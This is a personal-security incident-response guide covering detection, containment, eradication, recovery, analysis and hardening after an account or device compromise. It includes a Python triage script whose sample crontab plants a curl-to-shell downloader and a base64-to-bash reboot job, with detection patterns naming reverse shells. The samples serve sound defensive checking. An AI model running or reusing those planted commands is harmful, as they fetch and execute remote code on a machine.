Incident response is the systematic approach to managing and recovering from a security breach. When you discover you've been hacked, every minute counts. This guide walks you through the entire process – from detection to recovery and hardening.
The first 15 minutes are critical. Follow these steps in order to minimize damage and regain control.
The 6 Phases
1. Detection
Identify that something is wrong
2. Containment
Stop the bleeding immediately
3. Eradication
Remove the attacker's access
4. Recovery
Restore normal operations
5. Analysis
Understand what happened
6. Hardening
Prevent future attacks
Phase 1: Detection
How do you know you've been hacked? Common signs include:
Account alerts: Password changed emails you didn't request
Unusual activity: Posts, messages, or purchases you didn't make
Can't log in: Password suddenly "incorrect"
Device behavior: Slow performance, pop-ups, new toolbars
Bank alerts: Unknown transactions or card charges
Friends reporting: They received strange messages from you
Trust your gut. If something feels off, investigate immediately.
Phase 2: Immediate Containment
0-1 min
Disconnect from internet – Pull the ethernet cable, disable Wi-Fi, turn on airplane mode. This stops remote access and ongoing data theft.
1-2 min
Unplug external drives – Prevent ransomware from encrypting backups.
2-5 min
Use a clean device – Grab a friend's phone, work computer, or tablet that isn't compromised.
5-10 min
Change critical passwords – Start with your primary email (it is the recovery channel for every other account), then banking, then social media. Use the clean device, never the one you suspect is compromised.
Password tip: Use long, unique passwords (15+ characters). A password manager helps.
Phase 3: Eradication
Now you need to remove the attacker's access completely:
Email Accounts
✓ Change password
✓ Enable 2FA (authenticator app)
✓ Check forwarding rules (an attacker-added rule keeps copying your mail even after the password change)
✓ Review filters (look for rules that delete or hide security alerts and password-reset emails)
✓ Check connected apps (revoke any OAuth app or app password you don't recognise)
✓ Sign out all devices
Social Media
✓ Change password
✓ Check authorized apps
✓ Review login activity
✓ Remove unknown devices
✓ Check for unauthorized posts
Devices
✓ Run offline malware scan
✓ Check for unknown users
✓ Review startup programs
✓ Update all software
✓ Consider OS reinstall
Financial
✓ Call bank fraud line
✓ Freeze cards
✓ Review transactions
✓ Change online banking password
✓ Check payment methods
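The two device items above, "Check for unknown users" and "Review startup programs", are the ones most people skip because they don't know what "unknown" looks like. The following is an added example, not part of the original guide, showing what that check does on a Linux-style machine: it reads the account database in /etc/passwd format and a crontab and flags the two classic persistence tricks, a second UID 0 account and a scheduled job that downloads or decodes its payload at run time. The sample data, the `expected_users` set and the red-flag patterns are constructed for this example; on a real machine you would feed it the actual files.

```python
"""Triage a Linux-style account database and crontab for attacker persistence.

Added example, not from the original guide. It assumes a Unix-like device:
accounts in /etc/passwd format and scheduled tasks in crontab format.
The sample data below is constructed for this example.
"""
import re

# Constructed sample: a normal system plus two planted entries.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm:x:0:0::/tmp:/bin/sh
support:x:1001:1001::/home/support:/bin/bash
"""

CRONTAB_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * curl -s http://203.0.113.9/u.sh | sh
@reboot echo aGVsbG8= | base64 -d | bash
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def find_unexpected_accounts(passwd_text, expected_users):
    """Return (name, reason) for accounts that should not exist on a personal machine.

    Flags any UID 0 account other than 'root' (a classic backdoor) and any
    account with an interactive login shell that the owner does not recognise.
    """
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":", 6)
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 but not root"))
        elif shell not in NOLOGIN_SHELLS and name not in expected_users:
            findings.append((name, f"interactive shell {shell}, not an expected user"))
    return findings


# Patterns typical of "download and execute" or obfuscated cron payloads (assumed list).
CRON_RED_FLAGS = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),
     "fetches a script from the network and pipes it to a shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes a base64 blob at run time"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "opens a reverse or bind shell"),
]


def suspicious_cron_entries(crontab_text):
    """Return (command, reason) for cron jobs matching known persistence patterns."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Split the schedule (five fields, or one @keyword) from the command.
        parts = line.split(None, 1 if line.startswith("@") else 5)
        command = parts[-1]
        for pattern, reason in CRON_RED_FLAGS:
            if pattern.search(command):
                findings.append((command, reason))
                break
    return findings


if __name__ == "__main__":
    for name, reason in find_unexpected_accounts(PASSWD_SAMPLE, {"root", "alice"}):
        print(f"ACCOUNT {name}: {reason}")
    for cmd, reason in suspicious_cron_entries(CRONTAB_SAMPLE):
        print(f"CRON    {cmd!r}: {reason}")
```

Anything this flags is a reason to prefer the "Consider OS reinstall" item over cleaning by hand: a second root account or a reboot-time downloader means the attacker had full control, and a scan that finds nothing proves little.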
Phase 4: Recovery
Once you've removed the attacker, it's time to restore normal operations:
Restore from clean backups – If files were encrypted or deleted
Reset all passwords again – Yes, again. On the now-clean device
Enable 2FA everywhere – Every account that supports it
Update recovery information – Ensure email/phone are yours
Notify contacts – If attacker sent spam from your accounts
You're back in control. Take a breath. Now let's make sure it doesn't happen again.
Phase 5: Analysis
Understanding how you were hacked helps prevent future incidents:
How did they get in? Phishing? Weak password? Malware? SIM swap?
What did they access? Check account activity logs
When did it start? Look for the first suspicious event
Check for backdoors: Hidden rules, forwarding, connected apps
Check haveibeenpwned.com – See if your email was in a data breach
Document everything. Screenshots, timestamps, and notes help if you need to involve authorities.
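The questions above ("what did they access", "when did it start", "check for backdoors") and the email checklist in Phase 3 are all answered from the same place: the account's exported activity log. The block below is an added example, not part of the original guide, that builds a timeline from such an export, finds the first suspicious event, and lists the persistence mechanisms (forwarding rules, mail-hiding filters, changed recovery details) that survive a password change and must be undone by hand. It assumes a one-JSON-object-per-line export with the fields shown; real provider exports differ and need a small adapter. The events, `OWNER_COUNTRIES` and `OWNER_DOMAINS` are constructed for this example.

```python
"""Build a timeline from exported account-activity events and flag backdoors.

Added example, not from the original guide. It assumes the provider exports
activity as one JSON object per line with the fields used below (timestamp,
event, ip, country, details); real exports differ. Events are constructed.
"""
import json
from datetime import datetime

OWNER_COUNTRIES = {"US"}          # assumption: where the owner normally logs in from
OWNER_DOMAINS = {"example.com"}   # assumption: domains of the owner's own addresses

# Constructed sample, deliberately out of order to show that sorting matters.
ACTIVITY_SAMPLE = """\
{"timestamp": "2024-03-04T09:15:30Z", "event": "login", "ip": "198.51.100.7", "country": "US", "details": {}}
{"timestamp": "2024-03-01T08:02:11Z", "event": "login", "ip": "198.51.100.7", "country": "US", "details": {}}
{"timestamp": "2024-03-03T23:41:05Z", "event": "login", "ip": "203.0.113.44", "country": "RU", "details": {"new_device": true}}
{"timestamp": "2024-03-03T23:43:20Z", "event": "forwarding_rule_added", "ip": "203.0.113.44", "country": "RU", "details": {"to": "backup.mail@mailbox.test"}}
{"timestamp": "2024-03-03T23:44:02Z", "event": "filter_added", "ip": "203.0.113.44", "country": "RU", "details": {"match": "subject:security alert", "action": "delete"}}
{"timestamp": "2024-03-04T00:10:00Z", "event": "recovery_phone_changed", "ip": "203.0.113.44", "country": "RU", "details": {"to": "+15550100"}}
"""

# Event types that keep working after a password change (the "backdoors").
PERSISTENCE_EVENTS = {"forwarding_rule_added", "filter_added",
                      "recovery_phone_changed", "recovery_email_changed", "app_authorized"}


def classify(event):
    """Return a reason string if the event is suspicious, else None."""
    kind = event["event"]
    details = event.get("details", {})
    if kind == "login" and event.get("country") not in OWNER_COUNTRIES:
        return f"login from unexpected country {event.get('country')}"
    if kind == "forwarding_rule_added":
        domain = details.get("to", "").rpartition("@")[2]
        if domain not in OWNER_DOMAINS:
            return f"mail forwarded to external address {details.get('to')}"
    if kind == "filter_added" and details.get("action") in {"delete", "archive", "mark_read"}:
        return f"filter hides mail matching {details.get('match')!r} (action={details.get('action')})"
    if kind in {"recovery_phone_changed", "recovery_email_changed", "app_authorized"}:
        return f"{kind.replace('_', ' ')}: {details.get('to') or details.get('name')}"
    return None


def triage(activity_text):
    """Parse the export, sort by time and return (first_suspicious, backdoors, ips).

    first_suspicious: the earliest flagged event (answers "when did it start?")
    backdoors: flagged persistence events that must be removed by hand
    ips: every IP seen on a flagged event, for the "remove unknown devices" step
    """
    events = [json.loads(line) for line in activity_text.splitlines() if line.strip()]
    events.sort(key=lambda e: datetime.fromisoformat(e["timestamp"].replace("Z", "+00:00")))
    flagged = [(e, classify(e)) for e in events]
    flagged = [(e, r) for e, r in flagged if r]
    first = flagged[0][0] if flagged else None
    backdoors = [(e["timestamp"], r) for e, r in flagged if e["event"] in PERSISTENCE_EVENTS]
    ips = sorted({e["ip"] for e, _ in flagged})
    return first, backdoors, ips


if __name__ == "__main__":
    first, backdoors, ips = triage(ACTIVITY_SAMPLE)
    if first:
        print("first suspicious event:", first["timestamp"], classify(first))
    for ts, reason in backdoors:
        print("backdoor to remove:", ts, reason)
    print("attacker IPs:", ", ".join(ips))
```

The timestamps and IPs this produces are exactly the "screenshots, timestamps, and notes" the next line asks you to document, and the backdoor list is the set of changes that changing your password alone will not revert.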
Phase 6: Hardening
Lock down your digital life to prevent future attacks:
Essential
✓ Use a password manager
✓ Enable 2FA everywhere
✓ Use authenticator app (not SMS)
✓ Regular software updates
✓ Unique passwords for every site
Advanced
✓ Hardware security key (YubiKey)
✓ Set port-out PIN with mobile carrier
✓ Freeze your credit
✓ Use alias emails for signups
✓ Regular security audits
Emergency Contacts
Save these for quick access:
Bank fraud lines: Number on back of your card
Mobile carrier: To report SIM swap attempts
Local police: For identity theft reports
FTC Identity Theft: identitytheft.gov
IC3: ic3.gov (FBI cyber crime)
Printable Checklist
Emergency Incident Response Checklist
Print this and keep it somewhere safe. When disaster strikes, you won't have to think – just follow the steps.
Remember: Stay calm, follow the phases, and you'll get through this. We're here to help.